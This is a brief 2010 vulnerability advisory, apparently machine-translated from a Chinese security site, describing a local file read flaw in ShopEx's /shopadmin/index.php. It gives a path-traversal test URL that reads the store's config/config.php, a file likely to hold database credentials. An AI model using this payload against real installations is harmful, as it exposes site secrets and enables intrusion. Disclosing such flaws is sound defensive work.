ShopEx 网上 商店 系统 /shopadmin/index.php local file read vulnerability-vulnerability warning-the black bar safety net

2010-06-13T00:00:00
ID MYHACK58:62201027198
Type myhack58
Reporter 佚名
Modified 2010-06-13T00:00:00

Description

ShopEx Online Store platform software system, also known as shop management system, online program, online shopping system, online shopping system.

index. php in the parameters of the process exists the local file reading vulnerability

Test code:

http://myhack58.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

The current vendor has not provided the patch or upgrade process, we recommend the use of this software users follow the manufacturer's home page to get the latest version: www.ShopEx.cn